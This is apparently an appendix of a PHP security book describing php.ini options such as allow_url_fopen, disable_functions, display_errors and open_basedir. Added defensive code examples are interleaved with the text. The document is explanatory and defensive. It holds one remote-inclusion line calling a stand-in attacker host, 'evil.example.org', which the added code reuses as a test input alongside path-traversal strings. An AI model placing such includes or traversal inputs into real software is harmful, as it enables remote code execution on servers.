Configuration options
Although the focus of this book is on the security of the application, there are some configuration options that any developer who cares about security should be familiar with. The configuration of PHP affects the behavior of the code you write and the techniques you use, so you should take some responsibility for things beyond the application itself when necessary.
The configuration of PHP is primarily specified in a file named php.ini. This file contains many configuration options, each of which has a very specific effect on PHP. If the file does not exist, or if an option is not present in the file, the default value is used.
If you do not know where the php.ini file is located, you can use phpinfo() to see the path at which PHP looks for it:
<?php phpinfo(); ?>
The sixth line (labelled "Configuration File (php.ini) Path", shown in Figure A-1) gives the full path of php.ini. If only a directory path (no file name) is displayed, PHP could not find a php.ini file in that directory.
The file is very well commented, so you can read it and choose the configuration options that are right for you. The manual is more detailed, so when you need more information on an option, I recommend visiting http://www.php.cn/
Figure A-1. The phpinfo() function can be used to locate the php.ini file
A.1. allow_url_fopen
As Chapter 6 shows, the allow_url_fopen option lets you reference remote resources as if they were local files:
<?php $contents = file_get_contents('http://example.org/xss.html'); ?>
Chapter 5 shows the danger when this is combined with include or require:
<?php include 'http://evil.example.org/evil.inc'; ?>
I recommend turning off the allow_url_fopen option unless your application needs it.
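As an added example (not code from the book), here is the include pattern the two snippets above warn about, next to a hardened version that does not depend on allow_url_fopen being off. The page map, the file names and the separate allow_url_include directive in the report are assumptions made for this example.

```php
<?php
// Added example, not from the book. Page names and paths are assumptions.

// Vulnerable form: user input reaches include directly. With allow_url_fopen
// (and allow_url_include) enabled, the page value can be a remote URL, exactly
// the case the appendix warns about.
function render_page_unsafe(string $page): void
{
    include $page . '.inc';
}

// Hardened form: the user supplies a key, the file name comes from a fixed map.
// Neither a URL nor a traversal sequence survives the lookup, so the code stays
// safe even on a host where allow_url_fopen had to remain enabled.
const PAGE_MAP = [
    'home'    => 'home.inc',
    'contact' => 'contact.inc',
];

function resolve_page(string $page): ?string
{
    if (!array_key_exists($page, PAGE_MAP)) {
        return null;            // unknown key: refuse rather than guess
    }
    return __DIR__ . '/pages/' . PAGE_MAP[$page];
}

function render_page(string $page): void
{
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $file;
}

// Deploy-time check: report whether remote resources can still be opened or
// included at all (allow_url_include governs include/require separately).
function remote_access_report(): array
{
    return [
        'allow_url_fopen'   => (bool) ini_get('allow_url_fopen'),
        'allow_url_include' => (bool) ini_get('allow_url_include'),
    ];
}

// Constructed inputs: a valid key, a remote URL and a traversal attempt.
var_dump(resolve_page('home'));
var_dump(resolve_page('http://evil.example.org/evil.inc'));
var_dump(resolve_page('../../other.inc'));
print_r(remote_access_report());
```

The map is the real protection here; turning allow_url_fopen off removes one way to abuse the unsafe form, but the hardened form does not need that setting to be safe.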
A.2. disable_functions
The disable_functions option is very useful for ensuring that certain potentially dangerous functions cannot be used at all. Although it is possible to establish coding standards that prohibit the use of these functions, restricting them in the PHP configuration is far more reliable than relying on developers' adherence to a standard.
I suggest reviewing the functions listed in Appendix B to see which of them should be restricted.
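An added example, not from the book: a deploy-time check that parses the running disable_functions value and reports which entries of a policy list application code could still call. The two-function policy is constructed for illustration; the real candidate list is the one in Appendix B, which this page does not reproduce.

```php
<?php
// Added example, not from the book. The policy list is constructed.
//
// Matching php.ini fragment (assumed):
//   disable_functions = dl,phpinfo

// Parse the directive into a normalized list of lower-case names.
function disabled_functions(): array
{
    $raw   = (string) ini_get('disable_functions');
    $names = array_filter(array_map('trim', explode(',', $raw)));
    return array_values(array_map('strtolower', $names));
}

// Return the policy entries that application code could still call.
// function_exists() reports false for a function removed by disable_functions,
// so it reflects what the engine will actually allow rather than only what the
// ini file says; the parsed directive is kept for the report.
function still_callable(array $policy): array
{
    $callable = [];
    foreach ($policy as $fn) {
        if (function_exists($fn)) {
            $callable[] = strtolower($fn);
        }
    }
    return $callable;
}

$policy = ['dl', 'phpinfo'];   // constructed policy for this example

echo "disable_functions = " . implode(',', disabled_functions()) . "\n";
$open = still_callable($policy);
echo $open === []
    ? "policy satisfied\n"
    : "still callable: " . implode(', ', $open) . "\n";
```

Run this once per deployment target (the web SAPI, not only the CLI, since each can load a different php.ini) and treat any "still callable" line as a configuration defect.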
A.3. display_errors
PHP's error reporting helps you find mistakes in the code you write. While you are developing an application, displaying errors is an effective way to get instant feedback, and it speeds up development.
In a production application, this behavior is a security risk. If error messages are displayed, anyone can learn important information about your application.
In production you should turn off the display_errors option.
A.4. enable_dl
The enable_dl option controls whether the dl() function is available; dl() allows PHP extensions to be loaded at run time.
Using dl() can allow an attacker to bypass the open_basedir restriction, so you should disable it unless your application needs it.
A.5. error_reporting
Many security breaches are caused by the use of uninitialized variables or other sloppy programming practices. By setting PHP's error_reporting option to E_ALL or E_ALL | E_STRICT, you make PHP warn you about such behavior; these are reported as notice-level errors.
I recommend setting error_reporting to at least E_ALL (in development).
A.6. file_uploads
The file_uploads option determines whether file uploads are allowed at all. If your application does not require users to upload files, turning off this option is best.
It is not enough simply not to process uploaded files in your PHP code, because PHP does some work before your code runs (such as building the $_FILES array from the uploaded data).
A.7. log_errors
When log_errors is enabled, PHP writes all error messages to the file specified by the error_log configuration option.
When display_errors is disabled, it is important to enable log_errors; otherwise you will have no way to see the error messages.
I recommend enabling log_errors and setting the log file location with error_log.
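Putting A.3, A.5 and A.7 together, here is an added example (not from the book) of the production settings applied at runtime, with an error handler that keeps the detail in the log and shows the user nothing informative. The log path and the handler name are assumptions.

```php
<?php
// Added example, not from the book. Log path and function name are assumptions.
// The same values belong in php.ini for production; applying them here with
// ini_set() only covers code that runs after this point.

ini_set('display_errors', '0');               // nothing to the client
ini_set('log_errors', '1');                   // everything to the log...
ini_set('error_log', '/var/log/php/app.log'); // ...outside the web root (assumed)
error_reporting(E_ALL);                       // notices included

// Full detail goes to the log; the user sees a generic message at most.
function app_error_handler(int $errno, string $errstr, string $errfile, int $errline): bool
{
    error_log(sprintf('[%d] %s in %s:%d', $errno, $errstr, $errfile, $errline));
    if ($errno === E_USER_ERROR || $errno === E_RECOVERABLE_ERROR) {
        http_response_code(500);
        echo 'An internal error occurred.';
        exit(1);
    }
    return true;   // handled: PHP's own output for this error is suppressed
}
set_error_handler('app_error_handler');

// The kind of mistake E_ALL surfaces: a read of a variable that was never
// assigned. PHP 7 reports it as a notice, PHP 8 as a warning; either way it
// now lands in the log instead of in the page sent to the browser.
function greet(): string
{
    return 'Hello, ' . $name;   // $name is uninitialized
}
echo greet(), "\n";
```

Because the handler returns true, PHP does not log the error itself; the error_log() call inside the handler is what keeps log_errors meaningful, so do not drop it.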
A.8. magic_quotes_gpc
magic_quotes_gpc is a common option intended to prevent SQL injection. For many reasons, including the way it escapes input, it has proven to be imperfect.
It processes the data in $_GET, $_POST, and $_COOKIE using the same rules as the addslashes() function. Thus, it does not use the escaping function appropriate to your database.
There are two main reasons to disable magic_quotes_gpc:
First, it increases the complexity of your input filtering logic because it modifies the data before your code runs. For example, suppose you need to filter a name and the rule is to allow only letters, spaces, hyphens, and single quotes; when magic_quotes_gpc is enabled, you must either accommodate a name such as O\'Reilly or use stripslashes() to try to restore it to its original form. This unnecessary complexity (or the less stringent filtering it invites) increases the likelihood of mistakes, and flaws in your input filtering inevitably lead to security breaches.
Second, it does not use the escaping function appropriate to your database. Because it withstands some basic or casual attacks, it masks the fact that the filtering or escaping mechanism is poor, leaving your application with a hole that cannot withstand more sophisticated attacks such as character set attacks.
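The name filter described above, as an added example that is not from the book: magic quotes are undone only where they were actually applied, the whitelist is enforced with a regular expression, and the database escaping is left to a prepared statement. It uses an in-memory SQLite database through PDO so that it runs without a server; the pdo_sqlite extension, the table and the sample names are assumptions constructed for this example.

```php
<?php
// Added example, not from the book. Assumes the pdo_sqlite extension; the
// table and the sample names are constructed for this example.

// Undo magic quotes only where they were really applied, so the filter always
// sees what the user typed (O'Reilly, not O\'Reilly). get_magic_quotes_gpc()
// always returns false from PHP 5.4 and no longer exists in PHP 8, hence the
// guard and the silenced deprecation notice.
function raw_input(string $value): string
{
    if (function_exists('get_magic_quotes_gpc') && @get_magic_quotes_gpc()) {
        return stripslashes($value);
    }
    return $value;
}

// Whitelist filter from the text: letters, spaces, hyphens and single quotes.
// \z rather than $ so a trailing newline cannot slip through.
function filter_name(string $value): ?string
{
    $value = raw_input($value);
    return preg_match("/^[A-Za-z '\\-]{1,64}\\z/", $value) === 1 ? $value : null;
}

// Escaping is the driver's job: a bound parameter never becomes SQL text, so
// the single quote in O'Reilly needs no addslashes() and no database-specific
// escape function in application code.
function store_name(PDO $db, string $name): bool
{
    $clean = filter_name($name);
    if ($clean === null) {
        return false;
    }
    $stmt = $db->prepare('INSERT INTO people (name) VALUES (:name)');
    return $stmt->execute([':name' => $clean]);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE people (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');

// Constructed inputs: two valid names, one with a digit, one with punctuation.
foreach (["O'Reilly", 'Anne-Marie Smith', 'Smith42', "O'Reilly; --"] as $input) {
    printf("%-20s %s\n", $input, store_name($db, $input) ? 'stored' : 'rejected');
}
foreach ($db->query('SELECT name FROM people ORDER BY id') as $row) {
    echo $row['name'], "\n";
}
```

The filter decides what is acceptable and the prepared statement decides how it reaches the database; neither step depends on magic_quotes_gpc, which is why the option can be turned off without weakening anything.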
A.9. memory_limit
To prevent a poorly written script from consuming all available memory, you can use the memory_limit option to cap memory usage (specified in bytes or with an abbreviation such as 8M).
Although the best value depends on the application, I recommend the default of 8M in most cases.
The memory_limit option only takes effect if PHP was compiled with the enable-memory-limit option.
A.10. open_basedir
The open_basedir option restricts PHP to opening files only within the directories it specifies. Although it is no substitute for proper input filtering, this option reduces the attacks that exploit file-system-related functions such as include and require.
The value of this option is used as a prefix, so be careful not to omit the trailing slash when you intend to specify a directory:
open_basedir = /path/to/
Tip
Make sure the enable_dl option is off; otherwise the open_basedir restriction may be bypassed.
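As an added example (not from the book), here is the prefix behavior of open_basedir made concrete: the restriction is tightened at runtime to a directory created for the demonstration, and an application-level containment check resolves a user-supplied name before any file access. The directory under the system temp path and the file names are constructed for this example, which is meant to be run from the command line.

```php
<?php
// Added example, not from the book. Directory and file names are constructed.

// Set up a directory to restrict to. The trailing slash matters: a value of
// "/tmp/obd-demo" alone is a prefix that also matches "/tmp/obd-demo-old".
$base = sys_get_temp_dir() . '/obd-demo/';
if (!is_dir($base)) {
    mkdir($base, 0700, true);
}
file_put_contents($base . 'report.txt', "constructed sample file\n");
$base = realpath($base) . '/';   // resolve symlinks, keep the trailing slash

// open_basedir may be tightened (never loosened) from code; from here on,
// this request cannot open anything outside $base.
if (ini_set('open_basedir', $base) === false) {
    echo "could not tighten open_basedir\n";
}

// Application-level containment: resolve the user-supplied name and require
// the result to start with the base directory including its slash, for the
// same prefix reason as above. open_basedir is the backstop, not the only check.
function safe_path(string $base, string $userFile): ?string
{
    $real = @realpath($base . $userFile);      // false outside open_basedir
    if ($real === false) {
        return null;
    }
    $prefix = rtrim($base, '/') . '/';
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed inputs: a file inside the directory, a traversal out of it, and
// a sibling directory that shares the prefix without the slash.
foreach (['report.txt', '../outside.txt', '../obd-demo-old/x.txt'] as $name) {
    $path = safe_path($base, $name);
    printf("%-24s %s\n", $name, $path === null ? 'refused' : $path);
}
```

Keeping the check in code as well as in php.ini means a misconfigured host (for example one where the slash was dropped from the directive) still refuses the sibling-directory case.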
A.11. register_globals
See Chapter 2.
A.12. safe_mode
See Chapter 8.